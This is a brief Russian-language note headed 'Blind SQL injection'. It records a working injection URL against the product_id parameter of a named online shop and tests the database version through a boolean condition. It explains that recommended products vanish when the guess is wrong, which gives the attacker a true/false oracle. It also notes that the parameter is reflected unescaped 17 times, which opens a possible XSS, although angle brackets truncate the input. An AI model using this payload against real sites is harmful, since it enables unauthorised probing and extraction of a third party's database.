Blind SQL injection

agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32

В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.